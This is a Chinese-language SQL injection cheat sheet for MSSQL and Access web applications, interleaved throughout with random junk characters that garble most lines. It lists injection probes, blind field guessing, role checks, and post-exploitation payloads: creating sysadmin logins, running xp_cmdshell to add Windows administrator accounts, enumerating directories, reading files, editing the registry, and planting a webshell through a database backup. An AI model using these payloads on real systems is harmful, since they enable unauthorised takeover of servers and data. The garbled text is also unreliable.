1.判断是否有注入;and 1=1 ;and 1=2 `f b}cJUa
2.初步判断是否是mssql ;and user>0 T6{IuQjXs
i8dv|oa
3.注入参数是字符'and [查询条件] and ''=' [t0gX dU6
5~ jGF
4.搜索时没过滤参数的'and [查询条件] and '%25'=' m+1MoeR
^d!-IL_
5.判断数据库系统 >WDb89kC=
q~a6ES_lA
;and (select count(*) from sysobjects)>0 mssql c.NAUe_3
'!Q[+@$
;and (select count(*) from msysobjects)>0 access rJR"[TTJ
}mX;0qO
2p@S-Lp
>YLwWU<X
6.猜数据库 ;and (select Count(*) from [数据库名])>0 E4WoKuE1$
@!K)(B;A0b
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 A/GEDG
?
{N>VK*
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 {X8F4
PF4Cs3m/
9.(1)猜字段的ascii值(access) "&7v.-Yk(
pnVtjWrbG
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 YsLEbue
#K
]k
(2)猜字段的ascii值(mssql) IUI>/87u
_e/vw:
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 m,Os$>{Ok
.(3B}}gB>
10.测试权限结构(mssql) W4T>@b.
I2D<~xP~2+
'|Cs!Zl
0gxbo
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- w!tQU9+*
5q"
;R$+j
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 17J|g.]m-&
o^gqpQv
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- yl)}1DPP
~,dj)x
3M
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- HZ]'?&0
,p0R4gi
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 0;o`7f
H<"{wUPT0
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- :Iw)xd1d}\
O+c@B}[!
;and 1=(select IS_MEMBER('db_owner'));-- m
&s0Ub
{cC9
}w
[O9(sWL'
|VTm5.23
11.添加mssql和系统的帐户 nB"q
"o%N`Xlx
;exec master.dbo.sp_addlogin username;-- 7@MVInV9
;exec master.dbo.sp_password null,username,password;-- oO!@s`
S+_}=25
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- tOS%.0W5J
X,^J3Ek>O
;exec master.dbo.xp_cmdshell 'net user username password i3N _wv{
qH$G_R#)8B
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- fq_ 6xs
q4Qm:|-
;exec master.dbo.xp_cmdshell 'net user username password /add';-- )k=8.j4
[\eUCt F
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- "wA3l%d[Y
,Rz,[KI|
iiKFV>;t/
(lT
H EiX
12.(1)遍历目录 :,6dW?mun6
bvs0y7M='
;create table dirs(paths varchar(100), id int) cKdy)T%;
~cQP4
kBD]
;insert dirs exec master.dbo.xp_dirtree 'c:\' M'Q{2%:>a
7[^:[OEE
;and (select top 1 paths from dirs)>0 qFt%{~a
S
% ;09J
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) d8/lEmv[
^`Vt<DMT
~1i,R1_\Y
8&f}GdZh
(2)遍历目录 +u:8#!X$RD
"pQM$3n(
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- I
Yj\t?,0
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 (Sv 7^}j
!G Z2|~f9
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 R84g<
2-. g>'W
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 D3vd O2H
,m9Nd "6\
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 .0r5=
Y?R;Y:u3Z
p;U[cGHC
CSR6
13.mssql中的存储过程 /%=p-By<V
,`B*rCOa
xp_regenumvalues 注册表根键, 子键 >{$;O
&(IL`%
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 |C\g 3N-
JPS L-j
xp_regread 根键,子键,键值名 45W:b/n\
45>w=O
;exec xp_regread (;+JM*c2N
-;_NdL@
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 M
+~guTh
WQ|d;[E
xp_regwrite 根键,子键, 值名, 值类型, 值 VEd\*
i=#r JK=
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 *.~hn5Y|?
av&dGsFP
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 9Or3X/:o
!s9<%bp3
xp_regdeletevalue 根键,子键,值名 w1h07_u;v
"u3
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Oh5(8.<y
'h([Y8p{
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 {y)s85:t
Bm;{dO
XGk8Ki3w
rX{QgyY&
14.mssql的backup创建webshell WB"$NYB
tlA4oVII
use model sbQmPV
RT F9;]Ti
create table cmd(str image); ;_%61ZI?M<
/px*v<Aw1
insert into cmd(str) values (''); Yono8M;9*
7Z93`A-=
backup database model to disk='c:\l.asp'; ^kch]?
[yf2_{*0T
0@.$(Aqo(
)jn|+M
15.mssql内置函数 v'2EYTVNJD
`[C8iF*Y"
;and (select @@version)>0 获得Windows的版本号 AFc#2wn
W#8qhmt
;and user_name()='dbo' 判断当前系统的连接用户是不是sa L/c$p`-
q;}^Jpb;
;and (select user_name())>0 爆当前系统的连接用户 t&ztY]
qh
7'xT)~*$4
;and (select db_name())>0 得到当前连接的数据库 7"Zr:|$U
O HR9u
V89!C?.[]1
7Q/v#_e(
16.简洁的webshell ZL+{?1&-
Wu2#r\
use model J<H$B +;qR
m Wsegq4
create table cmd(str image); 9 %,_G.
`Z{;
c
insert into cmd(str) values (''); I`5F&8J{
L` V6\Ix(I
backup database model to disk='g:\wwwtest\l.asp';